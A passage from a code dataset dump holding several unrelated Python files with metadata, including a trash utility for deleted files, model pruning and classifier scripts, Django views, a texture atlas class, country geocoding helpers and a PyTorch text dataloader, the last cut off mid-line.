resolve the conflict in the destination.\")\n return\n else:\n shutil.move(to_restore[0], to_restore[1])\n \n pairs = pairs[0:-2]\n with open(TRASH + \"TRASH_LOG.log\", \"w\") as log:\n # all but the last\n for p in pairs:\n log.write(p + \"\\n\")\n\n\nparser = argparse.ArgumentParser()\nremove_vs_clean = parser.add_mutually_exclusive_group()\nremove_vs_clean.add_argument(\"file\", help=\"Remove FILE to ~/.trash.\", \n metavar=\"FILE\", nargs=\"*\", action=\"append\", default=[])\nremove_vs_clean.add_argument(\"-r\", \"--recursive\", help=\"Remove directory to ~/.trash.\", \n metavar=\"DIR\", nargs=\"*\", action=\"append\", default=[])\nremove_vs_clean.add_argument(\"-e\", \"--empty-trash\", help=\"Empty ~/.trash.\", action=\"store_true\")\nremove_vs_clean.add_argument(\"-u\", \"--undo\", help=\"Undo last delete.\", action=\"store_true\")\nparser.add_argument(\"--permanent\", help=\"Permanently delete file or directory.\", action=\"store_true\")\n\nargs = parser.parse_args()\n\n\n# verify that the trash exists\nif not os.path.exists(TRASH):\n os.mkdir(TRASH)\nif not os.path.exists(TRASH + \"TRASH_LOG.log\"):\n f = open(TRASH + \"TRASH_LOG.log\", \"w\")\n f.close()\n\n# parse the arguments\nif args.recursive:\n for arg in args.recursive[0]: # not sure why, but args.recursive is 2d\n recur(arg, args.permanent)\n\nif args.file:\n for arg in args.file[0]: # again; not sure why, but args.file is 2d\n single(arg, args.permanent)\n\nif args.empty_trash:\n clean()\n\nif args.undo:\n undo_delete()\n\n", "repo_name": "ClaytonMcCray/fakeRM", "sub_path": "tr.py", "file_name": "tr.py", "file_ext": "py", "file_size_in_byte": 3659, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 48, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 81, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "1832679764", "text": "import timm\nimport torch\nimport numpy as np\nfrom torchsummary import summary\n\nfrom nni.compression.pytorch.pruning import L1NormPruner\nfrom nni.compression.pytorch.speedup import ModelSpeedup\n\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef test_exclude():\n batch_size = 16\n inference_input = torch.randn(batch_size, 3, 360, 640).to(device)\n\n sparsity = 0.8\n model = timm.create_model('efficientnet_lite0', pretrained=True)\n model.to(device)\n print(\"Model Structure...\")\n print(model)\n\n print(\"\\nStarting Pruning Process...\")\n config_list = None\n # create pruned model\n config_list = [{\n 'sparsity_per_layer': sparsity,\n 'op_types': ['Linear', 'Conv2d']\n }, {\n 'exclude': True,\n 'op_names': ['conv_stem']\n }]\n\n print(\"\\nConfig List:\", config_list)\n\n dummy_input = torch.rand(1, 3, 360, 640).to(device)\n pruner = L1NormPruner(model, config_list)\n\n # compress the model and generate the masks\n _, masks = pruner.compress()\n\n # need to unwrap the model, if the model is wrapped before speedup\n pruner._unwrap_model()\n\n # speedup the model, for more information about speedup, please refer :doc:`pruning_speedup`.\n ModelSpeedup(model, dummy_input, masks).speedup_model()\n\n print(\"\\n\\n----------- Model Summary: Pruned at {}% with NNI -----------\\n\".format(sparsity * 100))\n if torch.cuda.is_available():\n model.cuda()\n summary(model, (3, 360, 640))\n\n\ntest_exclude()\n", "repo_name": "pmmitche/Masters-Thesis", "sub_path": "minimal_pruning_error_example.py", "file_name": "minimal_pruning_error_example.py", "file_ext": "py", "file_size_in_byte": 1503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 15, "usage_type": "call"}, {"api_name": "timm.create_model", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 36, "usage_type": "call"}, {"api_name": "nni.compression.pytorch.pruning.L1NormPruner", "line_number": 37, "usage_type": "call"}, {"api_name": "nni.compression.pytorch.speedup.ModelSpeedup", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torchsummary.summary", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "12976308799", "text": "from django.shortcuts import render, redirect\nfrom rest_framework import viewsets\n\nfrom .models import University\nfrom .serializers import UniversitySerializer\nfrom .forms import UniversityForm\n\n\ndef university(request):\n university = University.objects.using(\"university_db\").all()\n \n if request.method == \"POST\":\n form = UniversityForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/university\")\n else:\n form = UniversityForm()\n\n context = {\n 'university': university,\n 'form': form,\n }\n return render(request, \"university/university.html\", context)\n\n\nclass UniversityViewSet(viewsets.ModelViewSet):\n queryset = University.objects.using(\"university_db\").all()\n serializer_class = UniversitySerializer\n\n ", "repo_name": "surajkarki66/django-multiple-dbs-and-analytics", "sub_path": "university/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.University.objects.using", "line_number": 10, "usage_type": "call"}, {"api_name": "models.University.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.University", "line_number": 10, "usage_type": "name"}, {"api_name": "forms.UniversityForm", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.UniversityForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 27, "usage_type": "name"}, {"api_name": "models.University.objects.using", "line_number": 28, "usage_type": "call"}, {"api_name": "models.University.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.University", "line_number": 28, "usage_type": "name"}, {"api_name": "serializers.UniversitySerializer", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "17344435702", "text": "import math\nimport numpy as np\n\nfrom ..resource.workspace import Workspace\nfrom PIL import Image\nimport io\n\n\nclass Texture:\n \"\"\"\n Holds a texture with width, height and its texture data in rgba.\n \"\"\"\n def __init__(self):\n self.w = 0\n self.h = 0\n self.data = None # i = y * (w * 4) + x * 4 = (r, g, b, a)\n\n @classmethod\n def load_from_file(cls, workspace, location, enforce_square=True):\n \"\"\"\n Load a texture from a file\n\n :param enforce_square: if true, crop image to square (eliminates problems in things like animated textures)\n :param workspace: workspace to load from\n :type workspace: Workspace\n\n :param location: location of file\n :return:\n \"\"\"\n with workspace.get_file(location, 'rb') as f:\n im: Image.Image = Image.open(io.BytesIO(f.read()))\n im.load()\n self = cls()\n\n if im.width != im.height and enforce_square:\n # for now we just crop out animation frames\n im.crop((0, 0, im.width-1, im.width-1))\n\n self.w = im.width\n self.h = im.height\n if len(im.getbands()) == 3:\n im.putalpha(255)\n self.data = im.tobytes()\n return self\n\n\nclass ModelAtlas:\n TEX_SIZE = 128\n\n \"\"\"\n A ModelAtlas holds a bunch of textures on a grid, so the shader only needs one texture per block.\n\n Representation is a grid of 16x16 textures. (animated textures only use their first frame)\n Size is calculated once, and drawn at construction. Otherwise similar api to a :py:class:`Texture`.\n \"\"\"\n\n def __init__(self, textures):\n \"\"\"\n Create a new ModelAtlas\n\n :param textures: dictionary of names to :py:class:`Texture` instances\n \"\"\"\n self.textures = textures\n self.data = None\n self.size = [-1, -1]\n self._positions = {}\n\n self._layout()\n\n def _subgrid_layout(self, smaller, new_size, small_size, extra=()):\n \"\"\"\n Layout a subgrid\n\n :param smaller: list of smaller tiles\n :param new_size: size to pack to\n :param small_size: incoming size\n :param extra: things that are already new_size\n :return: list of locations\n \"\"\"\n\n size_factor = new_size / small_size\n grids = [\n []\n ]\n\n c_pos = [0, 0]\n\n for i in smaller:\n grids[-1].append((i, c_pos.copy()))\n c_pos[0] += small_size\n if c_pos[0] == size_factor * small_size:\n c_pos[1] += small_size\n c_pos[0] = 0\n if c_pos[1] == size_factor * small_size:\n grids.append([])\n c_pos = [0, 0]\n\n if not grids[-1]:\n grids = grids[:-1]\n\n for i in extra:\n grids.append([(i, [0, 0])])\n\n return grids\n\n def _blit(self, texture, to):\n \"\"\"\n Blit a texture to the atlas. Also updates the entry in the _positions table\n\n .. danger:\n Only works while laying out, i.e. when the array is 3d\n\n :param texture: blit me\n :param to: here\n \"\"\"\n self._positions[texture] = to\n self.data[to[1]:to[1] + self.textures[texture].h, to[0]:to[0] + self.textures[texture].w] = \\\n np.frombuffer(self.textures[texture].data, dtype=np.uint8).reshape((self.textures[texture].h,\n self.textures[texture].w, 4))\n # that crazy thing does a blit with numpy magic (maybe) (hopefully)\n\n def _draw_grid(self, c_pos, grid):\n \"\"\"\n Recursively draw this grid, starting at c_pos\n\n :param c_pos: start at\n :param grid: draw this\n \"\"\"\n for element in grid:\n to_draw, at = element\n a_pos = c_pos[0] + at[0], c_pos[1] + at[1]\n if type(to_draw) is str:\n self._blit(to_draw, a_pos)\n else:\n self._draw_grid(a_pos, grid)\n\n def _layout(self):\n \"\"\"\n Layout the modelatlas\n \"\"\"\n\n size_filtered = {}\n sizes = []\n for i in self.textures:\n if self.textures[i].w in size_filtered:\n size_filtered[self.textures[i].w].append(i)\n else:\n size_filtered[self.textures[i].w] = [i]\n sizes.append(self.textures[i].w)\n sizes.sort()\n grids = []\n previous_size = sizes[0]\n for i in sizes:\n grids = self._subgrid_layout(grids, i, previous_size, size_filtered[i])\n previous_size = i\n\n h_size = sizes[-1]\n row_count = min(len(grids), ModelAtlas.TEX_SIZE // h_size)\n if row_count < 1:\n row_count = 1\n h_size = row_count * sizes[-1]\n columns = math.ceil(len(grids)/row_count)\n\n self.data = np.zeros((columns*sizes[-1], h_size, 4))\n\n c_pos = [0, 0]\n for i in grids:\n self._draw_grid(c_pos, i)\n c_pos[0] += sizes[-1]\n if c_pos[0] == h_size:\n c_pos[0] = 0\n c_pos[1] += sizes[-1]\n\n self.data = self.data.reshape(4*h_size*columns*sizes[-1])\n self.size = [h_size, columns*sizes[-1]]\n\n def uv_for(self, tex, u, v):\n \"\"\"\n Get the UV for a texture in this atlas\n\n :param tex: texture name\n :param u: u, in pixels\n :param v: v, in pixels\n :return: U, V (floats)\n \"\"\"\n c_pos = self._positions[tex]\n a_pos = c_pos[0] + u, c_pos[1] + v\n return a_pos[0] / self.size[0], a_pos[1] / self.size[1]\n", "repo_name": "mincrmatt12/MCJsonTool", "sub_path": "mcjsontool/render/texture.py", "file_name": "texture.py", "file_ext": "py", "file_size_in_byte": 5626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.Image.Image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 118, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "23888546657", "text": "import pandas as pd\n\n#importa os dados e suas saidas\nprevisores = pd.read_csv('../breast_cancer_dataset/entradas_breast.csv')\nclasse = pd.read_csv('../breast_cancer_dataset/saidas_breast.csv')\n\nfrom sklearn.model_selection import train_test_split\nprevisores_treinamento, previsores_teste, classe_treinamento, classe_teste = train_test_split(previsores,classe, test_size =0.25)\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassificador = Sequential()\n# formula de partida para o units\n# entradas + saidas /2\n# (30+1)/2 = 15,5 => 16 \n# primeira camada oculta\nclassificador.add(Dense(units = 16, activation='relu', \n kernel_initializer='random_uniform', input_dim = 30))\n# camada de saida\nclassificador.add(Dense(units = 1, activation='sigmoid'))\n\n# cria a rede e define alguns parametros de treinamento\nclassificador.compile(optimizer='adam', loss='binary_crossentropy',\n metrics=['binary_accuracy'])\n\n# batch_size = numero de registros até atualizar pesos\n# epochs = numero de ciclos completos de interação com os dados\nclassificador.fit(previsores_treinamento,classe_treinamento, batch_size=10, epochs=100)\n\nprevisoes = classificador.predict(previsores_teste)\nprevisoes = (previsoes >0.5)\n\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\nprecisao = accuracy_score(classe_teste,previsoes)\n\nmatrix = confusion_matrix(classe_teste,previsoes)\n\nresultado = classificador.evaluate(previsores_teste,classe_teste)\n", "repo_name": "Allanfd12/Curso-Deep-Learning", "sub_path": "breast_cancer/breast_cancer_simples/breast_cancer_simples.py", "file_name": "breast_cancer_simples.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 8, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "13579597660", "text": "#!/usr/bin/env python3\n\nfrom urllib.request import urlopen # for getplace\nimport json # for getplace\nimport urllib.request, urllib.parse, urllib.error, codecs # for geonames\n\ndef getplace(lon, lat):\n \"\"\"\n Convert lon, lat to country\n DS - adapted from http://stackoverflow.com/questions/20169467/how-to-convert-from-longitude-and-latitude-to-country-or-city\n \"\"\"\n url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n url += \"latlng=%s,%s&sensor=false\" % (lat, lon)\n v = urlopen(url).read()\n j = json.loads(v)\n try:\n components = j['results'][0]['address_components']\n except: \n return '-'\n\n #components = { 'types': {'country':'-', 'town':'-'}} \n country = town = None\n for c in components:\n #print('CTYPES ', c)\n #print('CTYPES ', c['types'])\n if \"country\" in c['types']:\n country = c['long_name']\n if \"postal_town\" in c['types']:\n town = c['long_name']\n return country #, town, continent\n\n\n#------------------------------------------------------------\n\"\"\"\nRetrieve a list of information about countries, pulled from GeoNames.\nDS adapted from: from https://www.djangosnippets.org/snippets/1049/\n\nExample entry:\n\n {u'Area(in sq km)': u'33843',\n u'Capital': u'Chi\\\\u015fin\\\\u0103u',\n u'Continent': u'EU',\n u'Country': u'Moldova',\n u'CurrencyCode': u'MDL',\n u'CurrencyName': u'Leu',\n u'EquivalentFipsCode': u'',\n u'ISO': u'MD',\n u'ISO-Numeric': u'498',\n u'ISO3': u'MDA',\n u'Languages': u'mo,ro,ru,gag,tr',\n u'Phone': u'373',\n u'Population': u'4324000',\n u'Postal Code Format': u'MD-####',\n u'Postal Code Regex': u'^(?:MD)*(\\\\d{4})$',\n u'fips': u'MD',\n u'geonameid': u'617790',\n u'neighbours': u'RO,UA',\n u'tld': u'.md'}\n\"\"\"\n\n\nCOUNTRY_INFO_URL = \"http://download.geonames.org/export/dump/countryInfo.txt\"\n\ndef get_geonames_country_data():\n \"Returns a list of dictionaries, each representing a country\"\n udata = urllib.request.urlopen(COUNTRY_INFO_URL).read().decode('utf8')\n # Strip the BOM\n if udata[0] == codecs.BOM_UTF8.decode('utf8'):\n udata = udata[1:]\n # Ignore blank lines\n lines = [l for l in udata.split('\\n') if l]\n # Find the line with the headers (starts #ISO)\n header_line = [l for l in lines if l.startswith('#ISO')][0]\n headers = header_line[1:].split('\\t')\n # Now get all the countries\n country_lines = [l for l in lines if not l.startswith('#')]\n countries = []\n for line in country_lines:\n countries.append(dict(list(zip(headers, line.split('\\t')))))\n lastDS = countries[-1]\n wanted = 'Country ISO ISO3 Continent tld'.split()\n #if 'Germany' in line:\n # print('DS',lastDS['Country'],lastDS['ISO'], lastDS['ISO3'])\n #if 'United' in line:\n # print('DS',lastDS['Country'],lastDS['ISO'], lastDS['ISO3'])\n #for k in wanted:\n # print('DSK', k, lastDS[k] )\n #for kk in lastDS.keys():\n ## print('DSKK', kk, lastDS[kk] )\n #DS\n #nDS = 0\n #for h in headers:\n # print('h', h)\n # if h == 'Germany': print ('DE', nDS)\n # nDS += 1\n return countries\n\ndef getCountryInfo(country):\n\n countries=get_geonames_country_data()\n iso2, iso3, continent = '-' * 3\n for c in countries:\n #print 'Checking ', c['Country'], country\n if c['Country'] == country:\n iso2 = c['ISO']\n iso3 = c['ISO3']\n continent = c['Continent']\n return iso2, iso3, continent\n\ndef lonlat2ccodes(lon,lat):\n country = getplace(lon, lat)\n iso2, iso3, continent = getCountryInfo(country)\n return iso2, iso3, country, continent\n\nif __name__ == '__main__':\n\n import sys\n\n if len(sys.argv) > 1:\n if sys.argv[1] == '--xy':\n try:\n x, y = list(map(float, sys.argv[2].split()))\n country = getplace(x, y)\n iso2, iso3, continent = getCountryInfo(country)\n print('step-by-step', x, y, ' => ', iso2, iso3, country, continent )\n iso2, iso3, country, continent = lonlat2ccodes(x,y)\n print('lonlat2codes', x, y, ' => ', iso2, iso3, country, continent )\n except:\n #print(help(CountryStuff))\n sys.exit('Usage: CountryStuff --xy \"lon lat\"')\n\n else: \n \n # test google suggestion\n #print(getplace(0.1,51.1))\n #print(getplace(0.1,51.2))\n #print(getplace(0.1,51.3))\n print('Mace Heed: ', getplace( -9.00,53.3175))\n print('Tudor Hill: ', getplace(-64.87,32.27))\n x = -(11.0+53/60.0)\n y=78.0+54/60.0\n print('Zeppelin: ', getplace(x, y))\n \n # test geoname suggestion\n #g=get_geonames_country_data()\n testers = 'Germany Turkey Canada Greenland China India'.split()\n testers.append('New Zealand')\n for ccs in testers:\n iso2, iso3, continent = getCountryInfo(ccs)\n print(ccs, 'ISO2:', iso2, 'ISO3:', iso3, 'Cont:', continent)\n \n", "repo_name": "mifads/pyscripts", "sub_path": "emxgeo/geocountries.py", "file_name": "geocountries.py", "file_ext": "py", "file_size_in_byte": 4891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.urlopen", "line_number": 14, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 66, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "codecs.BOM_UTF8.decode", "line_number": 68, "usage_type": "call"}, {"api_name": "codecs.BOM_UTF8", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "24739390901", "text": "import pandas as pd\nimport os\nfrom tqdm import tqdm\ndata = pd.read_csv(\"../MSR_data_cleaned.csv\")\ndata_length = data.shape[0]\nprint(data_length)\nif not os.path.exists(\"../data/raw_code_Fan\"):\n os.mkdir(\"../data/raw_code_Fan\")\nvul_num = 0\nfor i in tqdm(range(data_length)):\n func_after = data.at[i, \"func_after\"]\n func_before = data.at[i,\"func_before\"]\n vul = data.at[i,\"vul\"]\n if vul ==1:\n vul_num = vul_num+1\n data_name = str(i)+\"_\"+str(vul)+\".c\"\n if func_after != func_before and vul != 1:\n print(data_name)\n filename = data_name\n # 文件有重名现象\n if os.path.exists(\"../data/raw_code_Fan\" + \"/\" + filename):\n with open(\"../data/raw_code_Fan\" + \"/\" + filename, 'r') as f:\n func = f.read()\n if func == func_after:\n print(filename)\n continue\n else:\n with open(\"../data/raw_code_Fan\" + \"/\" +filename, 'w') as f:\n f.write(func_before)\n i = i + 1\n with open(\"../data/raw_code_Fan\" + \"/\" + filename, 'w') as f:\n f.write(func_before)\nprint(vul_num)\n", "repo_name": "202221632987/Leev", "sub_path": "pre_code/make_code_Fan.py", "file_name": "make_code_Fan.py", "file_ext": "py", "file_size_in_byte": 1120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 8, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "38547795679", "text": "\"\"\"\n @Time : 203/22/19 10:40\n @Author : TaylorMei\n @Email : mhy845879017@gmail.com\n \n @Project : iccv\n @File : mask_detection.py\n @Function:\n \n\"\"\"\n\"\"\"\n @Time : 203/12/19 19:00\n @Author : TaylorMei\n @Email : mhy845879017@gmail.com\n\n @Project : iccv\n @File : mask_mirror.py\n @Function:\n\n\"\"\"\nimport os\nimport numpy as np\nimport skimage.io\n\ndetection_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/mask_rcnn_white_c_crop_resize/'\nimage_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/color_mirror/'\nmask_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/taylor5_384/'\noutput_path = '/media/iccd/TAYLORMEI/mirror/camera-ready/green_detection/'\n\nif not os.path.exists(output_path):\n os.mkdir(output_path)\n\nimglist = os.listdir(detection_path)\nfor i, imgname in enumerate(imglist):\n print(i, imgname)\n detection = skimage.io.imread(detection_path + imgname)\n image = skimage.io.imread(image_path + imgname[:-4] + '.jpg')\n mask = skimage.io.imread(mask_path + imgname)\n print(detection.shape)\n print(mask.shape)\n\n output = np.zeros_like(detection)\n\n for j in range(detection.shape[2]):\n if j != 3:\n output[:, :, j] = np.where(mask >= 127.5, image[:, :, j], detection[:, :, j])\n else:\n output[:, :, j] = detection[:, :, j]\n\n skimage.io.imsave(output_path + imgname, output)", "repo_name": "Mhaiyang/iccv", "sub_path": "utils/mask_detection2.py", "file_name": "mask_detection2.py", "file_ext": "py", "file_size_in_byte": 1353, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "skimage.io.io.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 36, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 36, "usage_type": "name"}, {"api_name": "skimage.io.io.imread", "line_number": 37, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 37, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 37, "usage_type": "name"}, {"api_name": "skimage.io.io.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 38, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 46, "usage_type": "call"}, {"api_name": "skimage.io.io.imsave", "line_number": 50, "usage_type": "call"}, {"api_name": "skimage.io.io", "line_number": 50, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "12422548025", "text": "from sklearn import model_selection\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom torch.utils.data import Dataset\nimport os\nimport torch\nimport pandas as pd\nimport numpy as np\n\nfrom discrepancy_datasetup import balance_dataset\nfrom discrepancy_datasetup import synonymsReplacement, shuffledTextAugmentation\nclass TextDataset(Dataset):\n\n def __init__(self, dataframe, tokenizer, dir_base, wordDict = None):\n self.tokenizer = tokenizer\n self.data = dataframe\n self.text1 = dataframe.impression1\n self.text2 = dataframe.impression2\n self.targets = self.data.label\n self.row_ids = self.data.index\n self.max_len = 512\n self.wordDict = wordDict\n\n #self.df_data = dataframe.values\n self.data_path = os.path.join(dir_base, \"public_datasets/candid_ptx/dataset1/dataset/\")\n self.dir_base = dir_base\n\n def __len__(self):\n return len(self.text1)\n\n\n def __getitem__(self, index):\n # text extraction\n #global img, image\n text1 = str(self.text1[index])\n text2 = str(self.text2[index])\n #if self.wordDict != None:\n # text1 = synonymsReplacement(self.wordDict, text1)\n # text1 = shuffledTextAugmentation(text1)\n # text2 = synonymsReplacement(self.wordDict, text2)\n # text2 = shuffledTextAugmentation(text2)\n text1 += text2\n text1 = \" \".join(text1.split())\n text2 = str(self.text2[index])\n text2 = \" \".join(text2.split())\n\n\n\n #print(text)\n #text = \"\"\n\n #text = text.replace(\"[ALPHANUMERICID]\", \"\")\n #text = text.replace(\"[date]\", \"\")\n #text = text.replace(\"[DATE]\", \"\")\n #text = text.replace(\"[AGE]\", \"\")\n\n #text = text.replace(\"[ADDRESS]\", \"\")\n #text = text.replace(\"[PERSONALNAME]\", \"\")\n #text = text.replace(\"\\n\", \"\")\n\n inputs1 = self.tokenizer.encode_plus(\n text1,\n None,\n add_special_tokens=True,\n max_length=self.max_len,\n #pad_to_max_length=True,\n padding= 'max_length', #True, # #TOD self.max_len,\n # padding='longest',\n truncation='longest_first',\n return_token_type_ids=True\n )\n ids1 = inputs1['input_ids']\n mask1 = inputs1['attention_mask']\n token_type_ids1 = inputs1[\"token_type_ids\"]\n\n inputs2 = self.tokenizer.encode_plus(\n text2,\n None,\n add_special_tokens=True,\n max_length=self.max_len,\n #pad_to_max_length=True,\n padding= 'max_length', #True, # #TOD self.max_len,\n # padding='longest',\n truncation='longest_first',\n return_token_type_ids=True\n )\n ids2 = inputs2['input_ids']\n mask2 = inputs2['attention_mask']\n token_type_ids2 = inputs2[\"token_type_ids\"]\n\n return {\n 'text1' : text1,\n 'ids1': torch.tensor(ids1, dtype=torch.long),\n 'mask1': torch.tensor(mask1, dtype=torch.long),\n 'token_type_ids1': torch.tensor(token_type_ids1, dtype=torch.long),\n\n 'text2' : text2,\n 'ids2': torch.tensor(ids2, dtype=torch.long),\n 'mask2': torch.tensor(mask2, dtype=torch.long),\n 'token_type_ids2': torch.tensor(token_type_ids2, dtype=torch.long),\n\n 'targets': torch.tensor(self.targets[index], dtype=torch.float),\n 'row_ids': self.row_ids[index],\n }\n\n\ndef setup_dataloader(df, config, tokenizer, wordDict=None):\n\n seed = config[\"seed\"]\n dir_base = config[\"dir_base\"]\n BATCH_SIZE = config[\"batch_size\"]\n # Splits the data into 80% train and 20% valid and test sets\n train_df, test_valid_df = model_selection.train_test_split(\n df, train_size=config[\"train_samples\"], random_state=seed, shuffle=True, stratify=df.label.values\n )\n # Splits the test and valid sets in half so they are both 10% of total data\n test_df, valid_df = model_selection.train_test_split(\n test_valid_df, test_size=config[\"valid_samples\"], random_state=seed, shuffle=True,\n stratify=test_valid_df.label.values\n )\n\n train_df = pd.concat([train_df, test_df])\n\n #train_df = balance_dataset(df, config)\n #train_df = balance_dataset(train_df, config, aug_factor=1)\n train_df.set_index(\"id\", inplace=True)\n valid_df.set_index(\"id\", inplace=True)\n test_df.set_index(\"id\", inplace=True)\n\n #print(fail)\n load_df_from_preset_location = False\n if load_df_from_preset_location:\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_final_train/seed' +str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + 